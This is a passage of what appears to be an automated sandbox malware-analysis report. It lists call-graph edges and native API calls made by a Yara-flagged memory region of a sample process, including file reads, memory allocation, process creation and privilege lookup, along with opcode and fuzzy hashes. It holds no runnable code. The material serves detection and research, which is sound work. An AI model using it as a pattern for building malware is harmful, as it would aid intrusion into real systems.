294ac30 LdrLoadDll 97973->97974 97975 294aee3 97974->97975 97976 294ac30 LdrLoadDll 97975->97976 97977 294aeec 97976->97977 97977->97758 97979 294af60 LdrLoadDll 97978->97979 97980 2949edc 97979->97980 98007 3332df0 LdrInitializeThunk 97980->98007 
97981 2949ef3 97981->97689 97983->97755 97985 294cf46 97984->97985 97986 294cf40 97984->97986 97987 294bf90 2 API calls 97985->97987 97986->97861 97988 294cf6c 97987->97988 97988->97861 97990 294cfd0 97989->97990 97991 294d02d 97990->97991 97992 294bf90 2 API calls 97990->97992 97991->97868 97993 294d00a 97992->97993 97994 294bdc0 2 API calls 97993->97994 97994->97991 97995->97865 97996->97879 97997->97881 97998->97883 97999->97886 98000->97888 98002 294ac4b 98001->98002 98003 2944e50 LdrLoadDll 98002->98003 98004 294ac6b 98003->98004 98005 2944e50 LdrLoadDll 98004->98005 98006 294ad17 98004->98006 98005->98006 98006->97902 98007->97981 98009 3332c11 98008->98009 98010 3332c1f LdrInitializeThunk 98008->98010 98009->97764 98010->97764 98012 294af60 LdrLoadDll 98011->98012 98013 294a68c RtlFreeHeap 98012->98013 98013->97767 98015 2937eb0 98014->98015 98016 2937eab 98014->98016 98017 294bd40 2 API calls 98015->98017 98016->97697 98024 2937ed5 98017->98024 98018 2937f38 98018->97697 98019 2949ec0 2 API calls 98019->98024 98020 2937f3e 98021 2937f64 98020->98021 98023 294a5c0 2 API calls 98020->98023 98021->97697 98026 2937f55 98023->98026 98024->98018 98024->98019 98024->98020 98025 294bd40 2 API calls 98024->98025 98030 294a5c0 98024->98030 98025->98024 98026->97697 98028 293817e 98027->98028 98029 294a5c0 2 API calls 98027->98029 98028->97653 98029->98028 98031 294af60 LdrLoadDll 98030->98031 98032 294a5dc 98031->98032 98035 3332c70 LdrInitializeThunk 98032->98035 98033 294a5f3 98033->98024 98035->98033 98037 294b5c3 98036->98037 98038 293acf0 LdrLoadDll 98037->98038 98039 2939c4a 98038->98039 98039->97660 98041 293b063 98040->98041 98042 293b0e0 98041->98042 98055 2949c90 LdrLoadDll 98041->98055 98042->97667 98045 294af60 LdrLoadDll 98044->98045 98046 293f1bb 98045->98046 98046->97670 98047 294a7d0 98046->98047 98048 294af60 LdrLoadDll 98047->98048 98049 294a7ef LookupPrivilegeValueW 98048->98049 98049->97672 98051 294a27c 98050->98051 98052 294af60 LdrLoadDll 
98050->98052 98056 3332ea0 LdrInitializeThunk 98051->98056 98052->98051 98053 294a29b 98053->97673 98055->98042 98056->98053 98058 293b1c9 98057->98058 98059 293b040 LdrLoadDll 98058->98059 98060 293b204 98059->98060 98060->97606 98062 293af34 98061->98062 98134 2949c90 LdrLoadDll 98062->98134 98064 293af6e 98064->97608 98066 293f3ac 98065->98066 98067 293b1c0 LdrLoadDll 98066->98067 98068 293f3be 98067->98068 98135 293f290 98068->98135 98071 293f3f1 98073 293f402 98071->98073 98076 294a490 2 API calls 98071->98076 98072 293f3d9 98074 293f3e4 98072->98074 98075 294a490 2 API calls 98072->98075 98073->97611 98074->97611 98075->98074 98076->98073 98078 293f43c 98077->98078 98154 293b2b0 98078->98154 98080 293f44e 98081 293f290 3 API calls 98080->98081 98082 293f45f 98081->98082 98083 293f481 98082->98083 98084 293f469 98082->98084 98086 293f492 98083->98086 98088 294a490 2 API calls 98083->98088 98085 293f474 98084->98085 98087 294a490 2 API calls 98084->98087 98085->97613 98086->97613 98087->98085 98088->98086 98090 293caa6 98089->98090 98091 293cab0 98089->98091 98090->97622 98092 293af10 LdrLoadDll 98091->98092 98094 293cb4e 98092->98094 98093 293cb74 98093->97622 98094->98093 98095 293b040 LdrLoadDll 98094->98095 98096 293cb90 98095->98096 98097 2944a50 8 API calls 98096->98097 98098 293cbe5 98097->98098 98098->97622 98100 293d646 98099->98100 98101 293b040 LdrLoadDll 98100->98101 98102 293d65a 98101->98102 98158 293d310 98102->98158 98104 293908b 98105 293cc00 98104->98105 98106 293cc26 98105->98106 98107 293b040 LdrLoadDll 98106->98107 98108 293cca9 98106->98108 98107->98108 98109 293b040 LdrLoadDll 98108->98109 98110 293cd16 98109->98110 98111 293af10 LdrLoadDll 98110->98111 98112 293cd7f 98111->98112 98113 293b040 LdrLoadDll 98112->98113 98114 293ce2f 98113->98114 98114->97635 98118 2938d14 98115->98118 98188 293f6d0 98115->98188 98117 2938f25 98117->97591 98118->98117 98193 29443a0 98118->98193 98120 2938d70 98120->98117 98196 2938ab0 98120->98196 98123 
294cf30 2 API calls 98124 2938db2 98123->98124 98125 294d060 3 API calls 98124->98125 98129 2938dc7 98125->98129 98126 2937ea0 4 API calls 98126->98129 98129->98117 98129->98126 98130 293c7b0 18 API calls 98129->98130 98131 2938160 2 API calls 98129->98131 98201 293f670 98129->98201 98205 293f080 21 API calls 98129->98205 98130->98129 98131->98129 98132->97615 98133->97632 98134->98064 98136 293f2aa 98135->98136 98144 293f360 98135->98144 98137 293b040 LdrLoadDll 98136->98137 98138 293f2cc 98137->98138 98145 2949f40 98138->98145 98140 293f30e 98148 2949f80 98140->98148 98143 294a490 2 API calls 98143->98144 98144->98071 98144->98072 98146 2949f5c 98145->98146 98147 294af60 LdrLoadDll 98145->98147 98146->98140 98147->98146 98149 294af60 LdrLoadDll 98148->98149 98150 2949f9c 98149->98150 98153 33335c0 LdrInitializeThunk 98150->98153 98151 293f354 98151->98143 98153->98151 98155 293b2d7 98154->98155 98156 293b040 LdrLoadDll 98155->98156 98157 293b313 98156->98157 98157->98080 98159 293d327 98158->98159 98167 293f710 98159->98167 98164 293d3a2 98164->98104 98166 293d3b5 98166->98104 98168 293f735 98167->98168 98180 29381a0 98168->98180 98170 293d36f 98175 294a6e0 98170->98175 98171 2944a50 8 API calls 98173 293f759 98171->98173 98173->98170 98173->98171 98174 294bdc0 2 API calls 98173->98174 98187 293f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 98173->98187 98174->98173 98176 294a6ff CreateProcessInternalW 98175->98176 98177 294af60 LdrLoadDll 98175->98177 98178 293d39b 98176->98178 98177->98176 98178->98164 98179 294a2a0 LdrLoadDll 98178->98179 98179->98166 98181 293829f 98180->98181 98182 29381b5 98180->98182 98181->98173 98182->98181 98183 2944a50 8 API calls 98182->98183 98185 2938222 98183->98185 98184 2938249 98184->98173 98185->98184 98186 294bdc0 2 API calls 98185->98186 98186->98184 98187->98173 98189 2944e50 LdrLoadDll 98188->98189 98190 293f6ef 98189->98190 98191 293f6f6 SetErrorMode 98190->98191 98192 293f6fd 98190->98192 98191->98192 
98192->98118 98195 29443c6 98193->98195 98206 293f4a0 98193->98206 98195->98120 98197 294bd40 2 API calls 98196->98197 98200 2938ad5 98197->98200 98198 2938cea 98198->98123 98200->98198 98225 2949880 98200->98225 98202 293f683 98201->98202 98273 2949e90 98202->98273 98205->98129 98207 293f4bd 98206->98207 98213 2949fc0 98207->98213 98210 293f505 98210->98195 98214 2949fdc 98213->98214 98215 294af60 LdrLoadDll 98213->98215 98223 3332f30 LdrInitializeThunk 98214->98223 98215->98214 98216 293f4fe 98216->98210 98218 294a010 98216->98218 98219 294af60 LdrLoadDll 98218->98219 98220 294a02c 98219->98220 98224 3332d10 LdrInitializeThunk 98220->98224 98221 293f52e 98221->98195 98223->98216 98224->98221 98226 294bf90 2 API calls 98225->98226 98227 2949897 98226->98227 98246 2939310 98227->98246 98229 29498b2 98230 29498f0 98229->98230 98231 29498d9 98229->98231 98234 294bd40 2 API calls 98230->98234 98232 294bdc0 2 API calls 98231->98232 98233 29498e6 98232->98233 98233->98198 98235 294992a 98234->98235 98236 294bd40 2 API calls 98235->98236 98237 2949943 98236->98237 98243 2949be4 98237->98243 98252 294bd80 LdrLoadDll 98237->98252 98239 2949bc9 98240 2949bd0 98239->98240 98239->98243 98241 294bdc0 2 API calls 98240->98241 98242 2949bda 98241->98242 98242->98198 98244 294bdc0 2 API calls 98243->98244 98245 2949c39 98244->98245 98245->98198 98247 2939335 98246->98247 98248 293acf0 LdrLoadDll 98247->98248 98249 2939368 98248->98249 98251 293938d 98249->98251 98253 293cf20 98249->98253 98251->98229 98252->98239 98254 293cf4c 98253->98254 98255 294a1e0 LdrLoadDll 98254->98255 98256 293cf65 98255->98256 98257 293cf6c 98256->98257 98258 293cf8f 98256->98258 98264 294a220 98256->98264 98257->98251 98258->98257 98269 294a810 98258->98269 98261 293cfa7 98262 294a490 2 API calls 98261->98262 98263 293cfca 98262->98263 98263->98251 98265 294a23c 98264->98265 98266 294af60 LdrLoadDll 98264->98266 98272 3332ca0 LdrInitializeThunk 98265->98272 98266->98265 98267 294a257 98267->98258 98270 
294af60 LdrLoadDll 98269->98270 98271 294a82f 98270->98271 98271->98261 98272->98267 98274 294af60 LdrLoadDll 98273->98274 98275 2949eac 98274->98275 98278 3332dd0 LdrInitializeThunk 98275->98278 98276 293f6ae 98276->98129 98278->98276

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 283 294a31d-294a31f 284 294a376-294a3b1 call 294af60 NtCreateFile 283->284 285 294a321-294a359 call 294af60 283->285
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,02944BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02944BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0294A3AD
Strings
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: d6f00bbf45da1e297f82529d7d951ab67a610424b36b51352bce5b31f8991bc7
• Instruction ID: 299a661b0c08f1b41a847beee6250ea985a59ab2db2606877b8a957dd6d84e8f
• Opcode Fuzzy Hash: d6f00bbf45da1e297f82529d7d951ab67a610424b36b51352bce5b31f8991bc7
• Instruction Fuzzy Hash: 4B11D0B2204208AFDB08DF88DC95DEB73AEEF8C754F108648BA0997240D630E811CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 291 294a360-294a3b1 call 294af60 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,02944BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02944BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0294A3AD
Strings
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction ID: 56a6081bdf3576a973fe6e14a4080b7ae6f92b56df594e4d2af5729109ef4708
• Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction Fuzzy Hash: 4DF0B2B2200208AFCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtReadFile.NTDLL(02944D72,5EB65239,FFFFFFFF,02944A31,?,?,02944D72,?,02944A31,FFFFFFFF,5EB65239,02944D72,?,00000000), ref: 0294A455
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 2da8bce052b574b1b82a7edc5e34550d658a61247c8d33e31bcee32fb904a413
• Instruction ID: d3921db827d0ffdfcf76d467598ec5ef20ad94a0b2b85de7bbd7815c4fa724c4
• Opcode Fuzzy Hash: 2da8bce052b574b1b82a7edc5e34550d658a61247c8d33e31bcee32fb904a413
• Instruction Fuzzy Hash: 31F0E2B2200108AFDB18CF88DC80EEB77A9FF8C354F158268BA1D97240D630E811CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtReadFile.NTDLL(02944D72,5EB65239,FFFFFFFF,02944A31,?,?,02944D72,?,02944A31,FFFFFFFF,5EB65239,02944D72,?,00000000), ref: 0294A455
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction ID: b11ae3ec0c618f01cad5a06c4f40abdf126860004c0bfc984c02d29c8e07b6d4
• Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction Fuzzy Hash: E2F0B7B2200208AFDB14DF89DC90EEB77ADEF8C754F158258BE1D97241DA30E811CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02932D11,00002000,00003000,00000004), ref: 0294A579
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: f2271e41b7b9ffb6d89243516a41a7a07b3e47e3204ddefbd352b06ebc613523
                                                                                                                    • Instruction ID: b7b139379e80fd9e4d569f1a1af29f0212ef997342ea7ad4271f9acdd6b80b14
                                                                                                                    • Opcode Fuzzy Hash: f2271e41b7b9ffb6d89243516a41a7a07b3e47e3204ddefbd352b06ebc613523
                                                                                                                    • Instruction Fuzzy Hash: D5F0F8B6200208AFDB14DF88DC91EA777A9EF88654F158258FE1997341C630E911CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02932D11,00002000,00003000,00000004), ref: 0294A579
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                    • Instruction ID: 8c99920797e77c8459640bf49d2c8ae639af4d846239d6437bef407aa5b1bf38
                                                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                    • Instruction Fuzzy Hash: 9AF015B2200208AFDB14DF89CC80EAB77ADEF88754F118258BE0897241C630F811CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • NtClose.NTDLL(02944D50,?,?,02944D50,00000000,FFFFFFFF), ref: 0294A4B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3535843008-0
                                                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                    • Instruction ID: 01907df9858f1e7b889a8d8e51b150c44f8c69bad81a98b85285ab87adb9b858
                                                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                    • Instruction Fuzzy Hash: 8CD012762402146BD710EB98CC45E97775DEF44750F154595BA185B241C530F50086E0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 46bf20871dd7572c082cf4c53714c9cf76c705da6d41ce1c508090c0b8ce1673
                                                                                                                    • Instruction ID: 9260a7d36bc8ce609e86b1cee45eb3ca78627ad01f8e0f4729499ee3645ec116
                                                                                                                    • Opcode Fuzzy Hash: 46bf20871dd7572c082cf4c53714c9cf76c705da6d41ce1c508090c0b8ce1673
                                                                                                                    • Instruction Fuzzy Hash: D6900265212404034105B25C4454616404A87E0201B55C021E1014990DC66699916225
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: f169c7bffe9b386688decf4b932a224805c898a812c758c4db94a15116031117
                                                                                                                    • Instruction ID: 241bbcbc0e9937020b7951a6051ab05881769c41d3d9b5239fd510accca80b72
                                                                                                                    • Opcode Fuzzy Hash: f169c7bffe9b386688decf4b932a224805c898a812c758c4db94a15116031117
                                                                                                                    • Instruction Fuzzy Hash: 4090023521140C02D180B25C444464A004587D1301F95C015A0025A54DCB569B5977A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: e34db20aff5167e97e53a94d5558b9edd49cbb7ee45073fc0842bb63f5fbcac1
                                                                                                                    • Instruction ID: 2744bd4d127fc21bfef9d201d38013a3be4622d8f04bd9f6af49cf4b45ef4991
                                                                                                                    • Opcode Fuzzy Hash: e34db20aff5167e97e53a94d5558b9edd49cbb7ee45073fc0842bb63f5fbcac1
                                                                                                                    • Instruction Fuzzy Hash: 6790023521544C42D140B25C4444A46005587D0305F55C011A0064A94D97669E55B761
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 212d6b461faf35bdc15072fab0f758696f511ad205704cc878244e98f6d23d85
                                                                                                                    • Instruction ID: e9af577363489a09a2b834c87c36b63b1b476bc8fd01f20221d567f152c120b0
                                                                                                                    • Opcode Fuzzy Hash: 212d6b461faf35bdc15072fab0f758696f511ad205704cc878244e98f6d23d85
                                                                                                                    • Instruction Fuzzy Hash: 65900229221404030105F65C0744507008687D5351355C021F1015950CD76299615221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 2a1e793b9999efee3f185f60385dc9b847caa23a2ead7cb45fe693154d2b53e8
                                                                                                                    • Instruction ID: 3caf0f9b5999ff0d4cc94d7a55096ab91a8b935aa8d3da760db709e99092dcfd
                                                                                                                    • Opcode Fuzzy Hash: 2a1e793b9999efee3f185f60385dc9b847caa23a2ead7cb45fe693154d2b53e8
                                                                                                                    • Instruction Fuzzy Hash: 0090026535140842D100B25C4454B060045C7E1301F55C015E1064954D875ADD526226
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 5ba7ed1f9579d842fad847237e9f33709fb2fb0f0f0c7b31a89d497bbc4187ec
                                                                                                                    • Instruction ID: c3d651e7c21275e3315baad6a51a32a8b3c46c09a70babf70d79a3f37900035f
                                                                                                                    • Opcode Fuzzy Hash: 5ba7ed1f9579d842fad847237e9f33709fb2fb0f0f0c7b31a89d497bbc4187ec
                                                                                                                    • Instruction Fuzzy Hash: A6900225221C0442D200B66C4C54B07004587D0303F55C115A0154954CCA5699615621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 4137cb60637f6cb23047c0d47fafc99e134406b312862c712f54c3d8b04fc589
                                                                                                                    • Instruction ID: 1c6d934a8b5ca88d521e5190b436de8fce7045329bce459d5d025e40a4c11d83
                                                                                                                    • Opcode Fuzzy Hash: 4137cb60637f6cb23047c0d47fafc99e134406b312862c712f54c3d8b04fc589
                                                                                                                    • Instruction Fuzzy Hash: 6D90027521140802D140B25C4444746004587D0301F55C011A5064954E879A9ED56765
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 7fa479b5aec85cfcc33b071e1b583b1107197ef6a6cd770e340d38c0b8071681
• Instruction ID: d746dfb8cefabac896625e4ef4433a9dddd7135556106cb3ffa068331278bf98
• Opcode Fuzzy Hash: 7fa479b5aec85cfcc33b071e1b583b1107197ef6a6cd770e340d38c0b8071681
• Instruction Fuzzy Hash: 5790022D22340402D180B25C544860A004587D1202F95D415A0015958CCA5699695321
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: df59af98784a4c766c8def77c139805e9555179141b61e1d13f1c192b5bc65d6
• Instruction ID: 6528e478dbdc285eb22d8ea868a80c39def04084f6073d6008d9600cd0ca80fd
• Opcode Fuzzy Hash: df59af98784a4c766c8def77c139805e9555179141b61e1d13f1c192b5bc65d6
• Instruction Fuzzy Hash: 9A90023521140813D111B25C4544707004987D0241F95C412A0424958D97979A52A221
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 84c53db9b41f54e512e87067a08d449f6a27b88add5e0b3c51d674429efe3c98
• Instruction ID: dd3332ad315418af8c11a79c75eb1b05c6418fa1f31b880d851f88392af4dc30
• Opcode Fuzzy Hash: 84c53db9b41f54e512e87067a08d449f6a27b88add5e0b3c51d674429efe3c98
• Instruction Fuzzy Hash: AB900225252445525545F25C4444507404697E0241795C012A1414D50C8667A956D721
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
